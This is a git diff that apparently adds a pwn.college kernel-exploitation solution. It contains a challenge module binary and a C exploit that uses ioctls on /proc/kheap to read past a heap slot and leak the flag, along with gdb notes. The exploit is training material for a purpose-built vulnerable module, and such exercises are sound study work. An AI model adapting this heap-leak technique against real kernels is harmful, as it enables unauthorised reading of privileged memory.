diff --git a/PwnCollege/KernelExploitation/.gitignore b/PwnCollege/KernelExploitation/.gitignore
new file mode 100644
index 0000000..ba2939b
--- /dev/null
+++ b/PwnCollege/KernelExploitation/.gitignore
@@ -0,0 +1 @@
+!*.ko
\ No newline at end of file
diff --git a/PwnCollege/KernelExploitation/Level1/challenge1.ko b/PwnCollege/KernelExploitation/Level1/challenge1.ko
new file mode 100644
index 0000000..445b0a5
Binary files /dev/null and b/PwnCollege/KernelExploitation/Level1/challenge1.ko differ
diff --git a/PwnCollege/KernelExploitation/Level1/challenge1.ko.i64 b/PwnCollege/KernelExploitation/Level1/challenge1.ko.i64
new file mode 100644
index 0000000..0ff7b43
Binary files /dev/null and b/PwnCollege/KernelExploitation/Level1/challenge1.ko.i64 differ
diff --git a/PwnCollege/KernelExploitation/Level1/exploit.c b/PwnCollege/KernelExploitation/Level1/exploit.c
new file mode 100644
index 0000000..7634ee3
--- /dev/null
+++ b/PwnCollege/KernelExploitation/Level1/exploit.c
@@ -0,0 +1,34 @@
+#include <stdio.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <string.h>
+#define CMD_PRINT 22274
+#define CMD_COPY_FLAG 22276
+#define CMD_COPY_TO_USER 22272
+#define CMD_COPY_FROM_USER 22273
+struct kheap_req_t {
+  void * ubuf;
+  size_t size;
+};
+int main() {
+    int fd = open("/proc/kheap", O_RDWR);
+    char buf[0x1000] = {0};
+    struct kheap_req_t req = {buf, 0};
+    req.size = 0x200;
+    memset(buf, '0', 0x1000);
+    ioctl(fd, CMD_COPY_FROM_USER, &req);
+    for (int i = 0; i < 0x1000; i++)
+      ioctl(fd, CMD_COPY_FLAG, &req);
+    req.size = 0x1000;
+    ioctl(fd, CMD_COPY_TO_USER, &req);
+    printf("%s", &buf[0x200]);
+    return 0;
+}
+// $ sudo cat /proc/modules
+// gdb> add-symbol-file /challenge/challenge1.ko 0xffffffffc0000000
+// gdb> b kheap_open
+// gdb> b kheap_ioctl
+// A slot is 0x200 bytes.
+// $ gcc exploit.c -o exploit
\ No newline at end of file